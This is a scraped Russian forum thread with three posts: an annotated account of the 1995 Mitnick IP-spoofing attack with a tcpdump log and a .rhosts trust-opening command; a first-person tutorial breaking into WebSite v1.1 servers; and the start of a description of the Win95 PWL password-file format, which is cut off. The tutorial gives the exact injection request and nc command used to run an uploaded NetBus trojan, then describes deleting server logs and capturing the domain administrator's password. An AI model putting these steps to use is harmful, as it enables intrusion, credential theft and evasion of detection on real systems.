&lt;3g5gkl$5j1@ariel.sdsc.edu&gt;<br />NNTP-Posting-Host: ariel.sdsc.edu<br />Keywords: IP spoofing, security, session hijacking</p> <p>Greetings from Lake Tahoe.<br />В статье Джона Маркоффа от 23.01.95 в NYT и в рекомендациях CERT CA-95:01, кажется, было достаточно много путаницы насчет того, что такое на самом деле атака с использованием подмены IP-адреса с целью подмены одного из абонентов соединения1. </p> <p>1Имеется в виду статья в New York Times под названием &quot;Data Network Is Found Open To New Threat&quot;. Следующая статья была опубликована 28 января 1995 года под названием &quot;Taking a Computer Crime to Heart&quot;. Заключительная статья &quot;A Most-Wanted Cyberthief Is Caught In His Own Web&quot; опубликована 16 февраля того же года. Time Magazine напечатал две статьи под следующими громкими заголовками:</p> <p>&quot;KEVIN MITNICK'S DIGITAL OBSESSION&quot; и &quot;CRACKS IN THE NET: America's most wanted hacker has been arrested, but the Internet is more vulnerable than ever&quot; (Да неужели!? Куда уж более!?).</p> <p>Шумиха, поднятая американской прессой по этому незначительному поводу, была столь велика, что нам остается только удивляться насколько еще верна крылатая фраза Шекспира: &quot;Много шума из ничего&quot;. Хотя, с другой стороны, это, можно объяснить тем, что, во-первых, в США благодаря стараниям прессы сложился легендарный образ злобного супер-хакера, этакого &quot;монстра&quot; киберпространства - Кевина Митника, во-вторых, это был один из редких случаев обнародования информации о случившейся удаленной атаке, в-третьих, ее осуществление удалось проследить и запротоколировать, что обычно очень не просто и, в-четвертых, с нашей точки зрения это, пожалуй, единственная известная, при этом довольно красивая удаленная атака на TCP- соединение и поэтому ей так и увлеклась пресса (истории о &quot;тупых&quot; атаках с перехватом пароля или попытками его подбора уже, видимо, навязли на зубах у читателя). <br /> </p> <p>Здесь приведены некоторые технические подробности из моей презентации 11.01.95 в CMAD 3 в Сономе, Калифорния. Надеюсь, это поможет снять всяческое непонимание природы этих атак.</p> <p>Для атаки использовалось два различных механизма. Подмена IP-адреса отправителя и математическое предсказание начального значения идентификатора TCP-соединения позволили получить доступ к бездисковой рабочей станции, которая использовалась как X-терминал.</p> <p>В письмо включен log-файл, полученный с помощью программы tcpdump, с записью всех пакетов, посланных атакующим. Для краткости этот файл приводится с сокращением некоторых несущественных подробностей.</p> <p>Моя конфигурация:<br />server = SPARC с ОС Solaris 1, обслуживающий x-terminal<br />х-terminal = бездисковая рабочая станция SPARC с ОС Solaris 1 <br />target = основная цель атаки </p> <p>Атака началась в 14:09:32 25.12.94. Первые попытки зондирования начались с хоста toad.com (информация взята из log-файла). </p> <p>14:09:32 toad.com# finger -l @target<br />14:10:21 toad.com# finger -l @server<br />14:10:50 toad.com# finger -l root@server<br />14:11:07 toad.com# finger -l @x-terminal<br />14:11:38 toad.com# showmount -e x-terminal<br />14:11:49 toad.com# rpcinfo -p x-terminal<br />14:12:05 toad.com# finger -l root@x-terminal<br />Зондирование системы позволило определить, есть ли у нее другие доверенные системы для дальнейшей атаки. То что атакующий смог запустить программы showmount и rpcinfo означало, что он является пользователем root на хосте toad.com. </p> <p>Через шесть минут мы видим шторм TCP-запросов на создание соединения с адреса 130.92.6.97 на 513 порт (login) хоста server. Основная цель атакующего при этом состоит в том, чтобы этими однонаправленными TCP-запросами переполнить очередь на 513 порту сервера так, чтобы он не смог отвечать на новые запросы на создание соединения. Особенно важно, чтобы сервер не смог сгененрировать TCP-пакет с битом RST в ответ на неожиданно пришедший TCP-пакет с битами SYN и ACK. </p> <p>Так как порт 513 является привилегированным портом, то теперь IP-адрес хоста server.login2 может быть свободно использован атакующим для атаки с использованием подмены адреса на r-службы UNIX-систем (rsh, rlogin). IP-адрес 130.92.6.97 атакующий выбрал случайным образом из неиспользуемых адресов (ему не нужно получать пакеты, передаваемые на этот адрес). </p> <p>14:18:22.516699 130.92.6.97.600 &gt; server.login: S 1382726960:1382726960(0) win 4096</p> <p>......</p> <p>14:18:25.599582 130.92.6.97.628 &gt; server.login: S 1382726988:1382726988(0) win 4096<br />14:18:25.653131 130.92.6.97.629 &gt; server.login: S 1382726989:1382726989(0) win 4096</p> <p>Хост server генерирует на первые 8 запросов соответственно 8 ответов, после чего очередь переполняется. Хост server периодически будет посылать эти ответы, но так и не дождется на них никакой реакции3. </p> <p>2 Шимомура сейчас и в дальнейшем после имени или IP - адреса хоста через точку указывает порт назначения. Поэтому запись server.login означает хост server и порт login (513). Соответственно, например, первая из распечатки log - файла запись 130.92.6.97.600 означает, что пакет передается с IP - адреса 130.92.6.97 с 600 порта. </p> <p>3 Эксперименты автора это подтвердили. <br /> </p> <p>Далее мы видим 20 попыток создания соединения с хоста apollo.it.luc.edu на x-terminal.shell. Основная цель этих запросов - определить закон изменения начального значения идентификатора TCP-соединения на хосте x-terminal. Так как значение ISN увеличивается на единицу с каждым вновь посылаемым запросом, то, следовательно, эти запросы генерирует не ядро сетевой ОС. При этом очередь запросов на хосте x-terminal не переполняется, так как атакующий после каждого запроса передает пакет с битом RST, что означает &quot;закрыть соединение&quot;. </p> <p>14:18:25.906002 apollo.it.luc.edu.1000 &gt; x-terminal.shell: S 1382726990:1382726990(0) win 4096<br />14:18:26.094731 x-terminal.shell &gt; apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096</p> <p>.......<br />14:18:35.395723 x-terminal.shell &gt; apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096<br />14:18:35.472150 apollo.it.luc.edu.982 &gt; x-terminal.shell: R 1382727009:1382727009(0) win 0<br />14:18:35.735077 apollo.it.luc.edu.981 &gt; x-terminal.shell: S 1382727009:1382727009(0) win 4096<br />14:18:35.905684 x-terminal.shell &gt; apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096<br />14:18:35.983078 apollo.it.luc.edu.981 &gt; x-terminal.shell: R 1382727010:1382727010(0) win 0<br />Видно, что каждый последующий ответный пакет SYN-ACK, посылаемый с хоста x-terminal, имеет начальное значение идентификатора TCP-соединения на 128000 больше чем у предыдущего4 . </p> <p>4 Из анализа приведенной распечатки пакетов видно, что каждое последующее начальное значение ISN на хосте x-terminal.shell отличается от предыдущего на 128000. Например, 2024256000 - 2024128000 = 128000 или 2024128000 - 2024000000 = 128000. Не правда ли, простейший закон генерации ISN?! <br /> </p> <p>Далее мы видим поддельный запрос на создание TCP-соединения якобы с хоста server.login на x-terminal.shell. При этом x-terminal доверяет хосту sever и, следовательно, x-terminal будет выполнять все запросы, переданные с этого хоста (или с любого другого, подменившего хост server). </p> <p>X-terminal затем отвечает на хост server пакетом SYN-ACK, и ожидает подтверждения этого пакета ACK'ом, что должно означать открытие соединения. Так как хост server игнорирует все пакеты, посланные на server.login, то поддельный пакет атакующего, подтвержденный ACK'ом, должен иметь успех. </p> <p>Обычно, значение подтверждения (ACK) берется из пакета SYN-ACK. Однако атакующий, используя предсказание закона изменения начального значения идентификатора TCP-соединения на хосте x-terminal, сможет получить значение ACK без получения пакета SYN-ACK5: </p> <p>14:18:36.245045 server.login &gt; x-terminal.shell: S 1382727010:1382727010(0) win 4096<br />14:18:36.755522 server.login &gt; x-terminal.shell: . ack 2024384001 win 4096<br />5Используя полученную математическую зависимость для предсказания значения ISN, атакующий может послать следующий пакет от имени server.login с значением ACK, равным 2024384001, вычисленным по его предыдущему значению 2024256000, добавлением к нему 128000.<br /> </p> <p>Хост атакующего сейчас имеет односторонее соединение с x-terminal.shell, который считает, что это соединение открыто с server.login. Атакующий теперь может передавать пакеты с данными с верными значения ACK на x-terminal. Далее, он посылает следующие пакеты: </p> <p>14:18:37.265404 server.login &gt; x-terminal.shell: P 0:2(2) ack 1 win 4096<br />14:18:37.775872 server.login &gt; x-terminal.shell: P 2:7(5) ack 1 win 4096<br />14:18:38.287404 server.login &gt; x-terminal.shell: P 7:32(25) ack 1 win 4096<br />что означает выполнение следующей команды: <br />14:18:37 server# rsh x-terminal &quot;echo + + &gt;&gt;/.rhosts&quot;6<br />6Атакующий, завершая атаку, от имени server.login посылает на x-terminal.shell три пакета, что эквивалентно выполнению на хосте server следующей r - команды: rsh x-terminal &quot;echo + + &gt;&gt;/.rhosts&quot;. Эта команда дописывает в файл /.rhosts строчку + + и делает доверенными все станции. <br /> </p> <p>Всего атака заняла менее 16 секунд.<br />Атакующий закрывает ложное соединение: </p> <p>14:18:41.347003 server.login &gt; x-terminal.shell: . ack 2 win 4096<br />14:18:42.255978 server.login &gt; x-terminal.shell: . ack 3 win 4096<br />14:18:43.165874 server.login &gt; x-terminal.shell: F 32:32(0) ack 3 win 4096<br />14:18:52.179922 server.login &gt; x-terminal.shell: R 1382727043:1382727043(0) win 4096<br />14:18:52.236452 server.login &gt; x-terminal.shell: R 1382727044:1382727044(0) win 4096<br />Далее атакующий посылает RST-пакеты и, следовательно, закрывает ранее открытые &quot;односторонние&quot; соединения с server.login, тем самым освобождая очередь запросов: </p> <p>14:18:52.298431 130.92.6.97.600 &gt; server.login: R 1382726960:1382726960(0) win 4096<br />.......</p> <p>14:18:54.097093 130.92.6.97.629 &gt; server.login: R 1382726989:1382726989(0) win 4096<br />Хост server.login снова готов к приему запросов на создание соединения&quot;. </p> <p>Автор намеренно не стал вдаваться в подробное литературное описание этого инцидента (беллетристики о Митнике написано более чем достаточно), а остановился только на технических подробностях этой удаленной атаки. В заключении приведем слова Шимомуры, сказанные им в своем интервью после поимки Митника, где он заявил следующее: &quot;Из того, что я видел, мне он не кажется таким уж большим специалистом&quot;7. И добавил: &quot;Проблема не в Кевине, проблема в том, что большинство систем действительно плохо защищены. То, что делал Митник, остается осуществимым и сейчас&quot;. </p> <p>7Кстати, по поводу того был ли на самом деле Кевин Митник действительно кракером высшего класса, ходит много споров. То, что он начинал как фрикер (phreaker) высшего класса, очевидно всем. Далее его кракерскую деятельность до первого похода в тюрьму трудно назвать профессиональной, так как он не отличился ничем, кроме профессионального лазанья по помойкам в поисках клочка выброшенной бумаги с паролями пользователей и заговариванием зубов сетевым администраторам по телефону, в попытках выудить у них пароли - тут он был действительно профессионалом (этому виду &quot;атак&quot; теперь даже дан термин: &quot;социальная инженерия&quot;). Однако, сидя в тюрьме, он, видимо, наконец поднабрался необходимого опыта в искусстве сетевого взлома и теперь уже вполне мог подходить под тот образ &quot;супер-хакера&quot;, созданный американской прессой. Хотя любому специалисту очевидно, что в данном случае в связи с простейшем законом генерации ISN в ОС Solaris 1, осуществленная Кевином удаленная атака является тривиальной и, по сути, Шимомура на нее сам напросился. Наверное, если Шимомура был бы действительно таким профессиональным специалистом по информационной безопасности, каким его описывает пресса, то он, очевидно, знал о возможности осуществления подобной атаки, но он ничего не предпринимал (интересно почему - может он именно того и хотел, чтобы его взломали? До этого случая Шимомуру никто и не знал, зато теперь он один из самых известных экспертов по безопасности). Точного ответа на эти вопросы, видимо, мы не узнаем. <br /> </p> <p>В заключении автор хотел бы добавить, что с подробным описанием механизмов реализации основных видов атак в сети Internet вы сможете ознакомиться в написанной мной в содружестве с П. Семьяновым новой книге &quot;Атака через Internet&quot;.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:47:02 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=21#p21 https://viktoro2007.apbb.ru/viewtopic.php?pid=20#p20 <p>Начало. <br /><br /><br /></p> <p>Как-то на HackZone я встретил заметочку о том, что взломан web-сервер фирмы IdSoftware с помощью стандартных примеров скриптов, идущих в поставке с WebSite'ом, - args.bat и uploader.exe. А так как в нашем университете довольно много www серверов на основе WebSite (ну если штук 5-6 это много), то я решил вплотную занятся ими :) <br /></p> <p>Итак, взлом осуществляется через стандартные примеры, идущие в поставке с web-сервером, а так как люди еще не сильно задумываются о защите своего сайта, считая это не очень большой проблемой, и часто оставляют все на Авось, то просто ставят WebSite, ничего не предпринимая для его настройки и обеспечения достаточной защиты. Все пять найденных мной сайтов под управлением WebSite v1.1 имели лазейку, описанную ниже, которая обеспечивала почти полный доступ к машине, на которой они находились, в том числе и мой :) <br /></p> <p>Необходимое. <br /><br /><br /></p> <p>Как у нас ставят WebSite? Просто давят кнопку Install, и потом прога говорит, что web-сервер поставлен. Люди находят, где находится корень web-сайта, закачивают туда свою информацию, и все так и живет, пока не наступает время дельта Тэ (с) Zeus. Что же появляется в таком состоянии? По умолчанию отображается (мапится, mapping) куча ненужных для работы сервера каталогов /java/, /publish/, /wsdocs/, /cgi-dos/, /cgi-win/. Конечно, в какой-то момент времени они, возможно, и понадобятся, но вначале они просто не нужны. Это с одной стороны, с другой стороны создателям WebSite со всех сторон нужно показать возможности этого сервера, что они с успехом и делают, открывая потециальные дырки в защите web сайта и заполняя эти каталоги разнообразными примерами, так радующими глаз потенциального взломщика. <br /></p> <p>Сперва я поставил себе на машину WebSite v1.1f в дефолтовой конфигурации и приступил к исследованию его на дырки. <br /></p> <p>Задача перед нами стоит такая: закачать на ломаемый сервер какое-нибудь средство удаленного администрирования и управления типа ВО или NetBus и запустить его (я использовал по-быстрому найденный в нашей локалке NetBus v1.6 с именем файла серверной части Patch.exe). <br /></p> <p>Этап закачки для нас не представлял никакого интереса т.к. по умолчанию WebSite позволяет удаленно запустить /cgi-win/uploader.exe и закачать кому угодно что угодно. В принципе, так даже можно положить эту самую НТ: закачивать туда всякой фигни, пока место на диске не кончится. Скорей всего, тут ей кранты и придут - это если WebSite стоит на том же диске, где стоит система или валяется своп-файл (но я в этих вопросах не сильно силен, пусть меня поправят более знающие люди, да и речь сейчас не об этом). <br /></p> <p>Вторым этапом является выяснение месторасположения каталога с WebSite'ом. Это делается тоже отчень легко, просто удаленно запускаем файл /cgi-dos/ args.bat, на что нам в ответ приходит сообщение типа </p> <p>Empty output from CGI program D:/WebSite/cgi-dos/args.bat</p> <p>, что однозначно определяет каталог с WebSite'ом. Тогда отображаемый каталог /cgi-dos/ будет находится в каталоге D:/WebSite/cgi-dos/, а путь к файлу Patch.exe, который мы закачиваем будет D:/WebSite/UploadS/Patch.exe <br /></p> <p>Итак, момент к которому мы подошли - это исследование на предмет возможности запуска файла, который мы закачали. Почитывая разные статьи по этому поводу, например, выяснилось, что у web-сервера Apache есть уязвимость на счет тестовых скриптов /cgi-bin/test-cgi и /cgi-bin/nph-test-cgi, которые аналогичны присутствующему в WebSite примеру Args.bat. Эта уязвимость заключается в том, что возможна распечатка передаваемой строки в таком виде, в каком она присутствует, и это обычно делается строчкой скрипта</p> <p>echo QUERY_STRING = $QUERY_STRING</p> <p>т.е. если мы передаем строчку типа &quot;&gt; 1.bat&quot;, то по логике вещей строчка &quot;QUERY_STRING =&quot; будет перенаправлена в файл 1.bat, путь к этому файлу мы могли бы указать на каталог /cgi-bin/, он бы туда записался, и далее уже удаленно мы могли бы его запустить из этого каталога. В args.bat находится строчка</p> <p>echo QUERY_STRING=&quot;%QUERY_STRING%&quot; &gt;&gt; %of%</p> <p>т.е. кто не слеп и видит, что строчка, передаваемая нами заключена в кавычки, и все, что мы надумали, просто-напросто обламывается. Обламывается-то обламывается, но все дело в том, что мы можем засылать специальные непечатные символы типа CR (код 0dh), LF( код 0ah). Улавливаете? :) Появление таких символов в командной строке приведет к переводу строки в скрипте и вполне возможно, что следущей строчкой вдруг ни с того ни с сего окажется наш файл лежащий в каталоге /uploads/ . Уф, такие мысли просто будоражат кровь! :) <br /></p> <p>Так, сейчас мы ее маленько остудим, рассмотрев немного теории, поясняющей как запускаются .bat скрипты на web сервере на основе WebSite. :) <br /></p> <p>При обработке bat-скрипта во временном каталоге WebSite /cgi-temp/ создаются 4 файла xxxxx.acc, xxxxx.bat, xxxxx.inp, xxxxx.out. Нам в глаза сразу бросается файл xxxxx.bat. Так, при удаленном запуске /cgi-dos/args.bat получается такой файл xxxxx.bat:</p> <p>@ECHO OFF&amp;&amp;TITLE WebSite CGI<br />D:\WebSite\cgi-dos\args.bat &lt; D:\WebSite\cgi-temp\xxxxx.inp &gt; D:\WebSite\cgi-temp\xxxxx.out</p> <p>если этому .bat файлу кинуть в командной строке аргументов, например, /cgi-dos/args.bat?africa.bat, то получим xxxxx.bat:</p> <p>@ECHO OFF&amp;&amp;TITLE WebSite CGI<br />D:\WebSite\cgi-dos\args.bat africa.bat &lt; D:\WebSite\cgi-temp\xxxxx.inp &gt; D:\WebSite\cgi-temp\xxxxx.out</p> <p>Кто знает, что такое перенаправление потока данных (значки &quot;&gt;&quot; и &quot;&lt;&quot;), сразу поймет, что здесь к чему. По-простому, WebSite создает временный xxxx.bat файл, результаты деятельности которого перенаправляются в файл xxxxx.out. Этот файл xxxxx.out отдается удаленному клиенту результатом работы скрипта, если в работе скрипта не произошло ошибки. Во временных файлах вместо символов xxxxx подставляется случайная последовательность символов. <br /></p> <p>Запускаем вот так /cgi-dos/args.bat?&gt;d:/Website/cgi-shl/1.bat получаем xxxxx.bat:</p> <p>@ECHO OFF&amp;&amp;TITLE WebSite CGI<br />D:\WebSite\cgi-dos\args.bat africa.bat ^&gt;D:/WebSite/cgi-shl/1.bat &lt; D:\WebSite\cgi-temp\xxxxx.inp &gt; D:\WebSite\cgi-temp\xxxxx.out<br /><br /><br /></p> <p>Видите, как нехорошо поступил WebSite - перед символом перенаправления &quot;&gt;&quot; поставил какую-то гадость &quot;^&quot;, от которой всякое перенаправление перестает быть перенаправлением. Если немного помучится, то можно выяснить, что эта фигня ставится перед символами &gt;,&lt; и |. Кстати, если залезть внутрь исполняемого файла сервера httpd32.exe, то вы увидите как раз стоящие отдельной группой данные символы. Обломс! <br /></p> <p>Как я уже писал выше, мы можем в командную строку вставлять спецсимволы, делается это так %0a. &quot;%&quot; - символ, говорящий о том, что следующие за ним два символа являются шестнадцатиричным представлением передаваемого в командной строке символа. <br /></p> <p>Запускаем /cgi-dos/args.bat?%0d%0aafrica.bat. Получаем xxxxx.out:</p> <p>@ECHO OFF&amp;&amp;TITLE WebSite CGI<br />D:\PROGRA~1\WebSite\cgi-dos\args.bat</p> <p>africa.bat &lt; D:\WebSite\cgi-temp\xxxxx.inp &gt; D:\WebSite\cgi-temp\xxxxx.out<br /><br /><br /></p> <p>Вот тут я подумал что они попали :), но жестоко обманулся! :( По моим мыслям, сначала управление передастся их батчику, а потом моему исполняемому файлу, который я закачал в /uploads/. Меня жестоко обманули, управление, переданное файлу args.bat, там и оставалось. Моему файлу africa.bat оставалось лишь смотреть, как управление было всего в одной строчке сверху его! :) <br /></p> <p>Cнова думаем! Вернемся к перенаправлению, если забивать много много перенаправлений типа &quot;&gt;&quot;, то вполне возможно, что в какой-то момент времени на каждый значок &quot;&gt;&quot; не хватит значка &quot;^&quot;, так как вполне возможно, что буфер у WebSite не резиновый. :) Стандартными средствами тут я уже обходится не мог, так как не мог ввести слишком много значков в строке адреса Internet Explorer'a, поэтому пришлось воспользоваться программой NetCat v1.10 for NT, ох и рульная же это вещица, при всем при том, что о большинстве функций я вообще не знаю, для чего они нужны. В моем случае она просто брала из файла запрос и отсылала его серверу. </p> <p>nc.exe -v ИмяЛомаемогоСервера 80 &lt; Zapros.txt </p> <p>Zapros.txt:<br />GET /cgi-dos/args.bat?&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;....&gt;&gt;&gt;africa.bat <br /></p> <p>Вот такой файл, где значков &quot;&gt;&quot; около 700 штук после запуска NetCat'a с такими параметрами у меня повесил WebSite :) Хорошенькая нашлась фича, и, главное, обнаружилась фича, что если число значков равно 512, то вместо строк в темповом батчике xxxxx.bat </p> <p>@ECHO OFF&amp;&amp;TITLE WebSite CGI D:\PROGRA~1\WebSite\cgi-dos\args.bat?^&gt;^&gt;^&gt;^&gt;...^&gt;^&gt; africa.bat &lt; D:\WebSite\cgi-temp\xxxxx.inp &gt; D:\WebSite\cgi-temp\xxxxx.out <br /></p> <p>Получается файл xxxxx.bat: </p> <p>@ECHO OFF&amp;&amp;TITLE WebSite CGI africa.bat^&gt;^&gt;^&gt;^^&gt;^&gt;^&gt;^^&gt;^&gt;^&gt;^^&gt;^&gt;^&gt;^....^&gt;^&gt;^&gt;^^&gt;^&gt;^&gt;^^&gt;^&gt;^&gt;^ D:\WebSite\cgi-temp\xxxxx.inp &gt; D:\WebSite\cgi-temp\xxxx.out <br /></p> <p>Классное переполнение буфера получилось!!!!! Затем я после africa.bat поставил символы перевода строки 0dh,0ah (%0d%0a) и africa.bat поменял на regedit.exe, запустил NetCat, и что бы вы думали, у меня получилось? :) Угу, запустился regedit!!!! <br /></p> <p>Я еще немного потренировался, и выяснилось, что она не хочет, или не желает пускать програмки с длинными именами и с длинными путями к ним. Хорошо, что Website, где я его встречал, стоит прямо в корне, и доступ к каталогу /uploads/ получаем без проблем. И еще хорошо, что я начал с символа &quot;&gt;&quot;, если подставлять другие нормальные символы типа буковок или циферок, то WebSite на это никак не реагирует, просто не принимает их, если их довольно большое количество, и выдает ошибку, если они все поместились в буфер. <br /></p> <p>Ну, вот так я запустил на другой машинке NetBus, и дальше уже дело техники (почти). <br /></p> <p>Выкачиваем все нужное с Хакнутой машины. <br />Закачиваем в каталог /cgi-shl/ с помощью NetBus'а еще одну копию серверной части этого самого NetBus'a под каким-нибудь дурацким именем. Я, например, закачиваю под именем win-c-example.exe т.к. он в этом каталоге уже есть, только соответственно старый файл нужно убить. <br />Убиваем логи сервера access.log, error.log, upload.log. Вы думаете их просто убить? =) Фиг там, WebSite держит их открытыми, тут-то нам и пригодится умение ронять WebSite обнаруженный в начале нашего исследования. т.е. роняем WebSite, и только затем удаляем все логи. <br />Нехорошо, если после нас в каталоге /uploads/ останется бяка в виде серверной части NetBus'a, ее нужно убить, но увы, она держится системой открытой поэтому мы просто перезагружаем всю машинку с WebSite'ом, перед этим сказав NetBus'у &quot;Remove Server&quot;. Вот эта часть плана у меня не очень чисто проходила, в NetBuse я использовал и Reboot и Shutdown, и все равно удаленный сервер сам по себе не поднимался, не знаю почему, а пробовать на своей машине было влом. Тем не менее когда-нибудь ту машинку поднимали, считая что Винда это Сакс, и он сам может из-за пылинки вылететь в даун. Когда сервер снова поднялся, быстренько из /cgi-shl/ запускаем снова Netbus и чистим /uploads/ (Позже я выяснил, что NetBus копирует себя в системный каталог операционнки, и оттуда загружается в следующий раз, поэтому описанные действия немного неточны, и необходимо просто перезагрузить сервер) </p> <p>Фу! Ну вот и все, дальше все ясненько, можно ломать дальше, отслеживая пароль Administrator'a т.к. обычно на тех тачках, где весит WebSite, находится и PDC (Primary Domain Controler). Можно, балуясь NetBus'ом, создать ситуацию, когда Administrator будет вынужден подойти к своему детищу и набрать заветное слово, которое нам и покажет Netbus :) Короче, все остальное лирика. <br /></p> <p>Был произведен &quot;дружественный взлом&quot; двух серверов, выкачана с них нужная информация, ну и затем сообщено о существующей дырке. В WebSite v2.xxx эта дыра закрыта, так как отсутствует каталог /cgi-dos, но присутствуют другие файлы типа guestbook, которая позволяет писать тэги, плюс присутствуют сырцы этих файлов, что меня очень радует и дает возможность заниматься таким интересным делом! :) <br /></p> <p>Никаких заключительных слов говорить не буду, читайте статью DiGGertaL SpOOn'а, там как раз есть то, что можно делать после взлома и заключительные слова. <br /></p> <p>&quot;Все это мое последнее слово&quot; Дельфин</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:46:02 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=20#p20 https://viktoro2007.apbb.ru/viewtopic.php?pid=19#p19 <p>Сразу оговариваюсь, что все, что&#160; ниже&#160; будет&#160; сказано,&#160; имеет&#160; отношение<br />только к Win3.11 и Win95, причем Win95 без установленного Service Pack 1.<br />У&#160; OSR2&#160; и Win98, а также у Win95 с установленным Service Pack 1, другая,<br />хотя и похожая система шифрования, которая не&#160; имеет&#160; такого&#160; изобилия&#160; и<br />разнообразия&#160; дыр&#160; и поэтому менее интересна для обсуждения. Отличить обе<br />системы друг от друга можно по магическим числам в начале PWL-файла :</p> <p>Win3.11&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; \<br />Win95 без Service Pack 1 /&#160; B0 46 4D 4E (видны буквы &quot;MFN&quot;)<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; <br />Win95 с Service Pack 1 \<br />OSR2&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &gt;&#160; E3 82 85 96 (в альтернативной кодировке<br />Win98&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; /&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;выглядит как &quot;yВЕЦ&quot;)</p> <p>Все, что далее будет сказано имеет отношение только к PWL-файлам, имеющим<br />сигнатуру &quot;MFN&quot;.</p> <p>Для&#160; начала,&#160; бросим&#160; беглый&#160; взгляд&#160; внутрь&#160; PWL-файла,&#160; чтобы&#160; &#160;получше<br />ориентироваться в этой эклектической конструкции.</p> <p>Формат PWL-файла<br />Содержимое&#160; PWL-файла&#160; производит&#160; весьма&#160; мутное&#160; впечатление.&#160; &#160;Строгая<br />документация&#160; от&#160; MicroSoft&#160; по этому вопросу отсутствует due to security<br />(саркастический&#160; смешок)&#160; reason,&#160; а&#160; сам&#160; я&#160; разбирался&#160; лишь&#160; &#160;в&#160; &#160;меру<br />необходимости.&#160; &#160;Поэтому&#160; &#160;правильнее&#160; &#160;озаглавить&#160; &#160;-&#160; примерный&#160; формат<br />PWL-файла, в предположении, что в нем&#160; не более&#160; 16-и&#160; ресурсов&#160; (похоже,<br />что&#160; &#160;PWL-файл&#160; может&#160; содержать&#160; только&#160; кратное&#160; 16-и&#160; число&#160; ресурсов,<br />используемых и неиспользуемых, но мне&#160; ни&#160; разу&#160; не&#160; попадался&#160; экземпляр<br />более чем с 16-ю ресурсами).</p> <p>0000:&#160; 4 байта - магическое число или сигнатура. Просто безполезное число.<br />&#160; &#160; &#160; &#160;В&#160; разных&#160; форматах&#160; PWL-файлов&#160; оно&#160; разное.&#160; Чем&#160; и&#160; помогает их<br />&#160; &#160; &#160; &#160;различать :<br />&#160; &#160; &#160; &#160;B0 46 4D 4E - Win3.11/Win95<br />&#160; &#160; &#160; &#160;E3 82 85 96 - OSR2/Win98<br />0004:&#160; Дв. слово - очень странный счетчик. Что-то явно считает, но что ?<br />0008:&#160; Таблица из&#160; 256-и&#160; байт.&#160; Гордо называется&#160; Resource&#160; Link&#160; Index.<br />&#160; &#160; &#160; &#160;Странная таблица. Ясно, что нулевой байт означает неиспользованный<br />&#160; &#160; &#160; &#160;элемент. Но какая польза с ненулевого байта - не совсем ясно. Если<br />&#160; &#160; &#160; &#160;в&#160; этой таблице встречается ненулевой байт N, то это означает, что<br />&#160; &#160; &#160; &#160;в следующей таблице используется (не равен FF) элемент по смещению<br />&#160; &#160; &#160; &#160;108h+N. Но всю полезную информацию можно сразу извлечь&#160; из&#160; второй<br />&#160; &#160; &#160; &#160;таблицы, не обращаясь к первой.<br />0108:&#160; Безхозный нулевой байт. Никому не мешает.<br />0109:&#160; Таблица&#160; Resource&#160; Key&#160; Entry из 255-и байт. Теперь неиспользуемый<br />&#160; &#160; &#160; &#160;элемент обозначается&#160; уже&#160; байтом&#160; FF.&#160; Вероятно&#160; между&#160; созданием<br />&#160; &#160; &#160; &#160;первой&#160; и второй таблиц программистом был пропущен стаканчик. Если<br />&#160; &#160; &#160; &#160;в этой таблице&#160; находится&#160; M&#160; байтов&#160; N,&#160; не&#160; равных&#160; FF,&#160; то&#160; это<br />&#160; &#160; &#160; &#160;означает,&#160; что&#160; в&#160; ресурсе номер N содержится M парольных записей.<br />&#160; &#160; &#160; &#160;Обшее число не&#160; равных&#160; FF&#160; байт&#160; в&#160; таблице&#160; равно&#160; общему&#160; числу<br />&#160; &#160; &#160; &#160;парольных&#160; записей.&#160; Отсюда&#160; ясно,&#160; что&#160; в PWL-файле не может быть<br />&#160; &#160; &#160; &#160;более&#160; 255-и&#160; парольных&#160; записей&#160; и&#160; более&#160; 255-и&#160; &#160;ресурсов,&#160; &#160;их<br />&#160; &#160; &#160; &#160;содержащих.<br />0208:&#160; 20&#160; байт - имя пользователя в верхнем регистре, дополненное справа<br />&#160; &#160; &#160; &#160;нулевыми&#160; байтами&#160; (русские&#160; буквы&#160; в&#160; Альтернативной&#160; кодировке).<br />&#160; &#160; &#160; &#160;Данное поле служит для странного алгоритма определения подлинности<br />&#160; &#160; &#160; &#160;пароля.&#160; Имя&#160; пользователя&#160; можно посмотреть в файле system.ini, в<br />&#160; &#160; &#160; &#160;свойстве Password Lists и, если оно не длиннее восьми символов, то<br />&#160; &#160; &#160; &#160;оно будет совпадать с именем PWL-файла.<br />021C:&#160; 17 слов - таблица указателей на начала ресурсов.<br />&#160; &#160; &#160; &#160;21C:Смещение в файле начала ресурса 0, относительно начала файла<br />&#160; &#160; &#160; &#160;21E:Смещение в файле начала ресурса 1, относительно начала файла<br />&#160; &#160; &#160; &#160;220:Смещение в файле начала ресурса 2, относительно начала файла<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;...<br />&#160; &#160; &#160; &#160;23A:Смещение в файле начала ресурса F, относительно начала файла<br />&#160; &#160; &#160; &#160;23C:Смещение первого байта за концом файла (равно длине файла).<br />&#160; &#160; &#160; &#160;Обе записи 208h-21Bh и 21Ch-23Dh&#160; образуют&#160; единое&#160; поле,&#160; которое<br />&#160; &#160; &#160; &#160;зашифровано гаммой, накладываемой начиная со смещения 208h.<br />023E:&#160; Ресурс 0<br />&#160; &#160; &#160; &#160;Ресурс 1<br />&#160; &#160; &#160; &#160;Ресурс 2<br />&#160; &#160; &#160; &#160; &#160;...<br />&#160; &#160; &#160; &#160;Ресурс F<br />&#160; &#160; &#160; &#160;В&#160; одном ресурсе может быть несколько парольных записей, следующих<br />&#160; &#160; &#160; &#160;одна за другой. 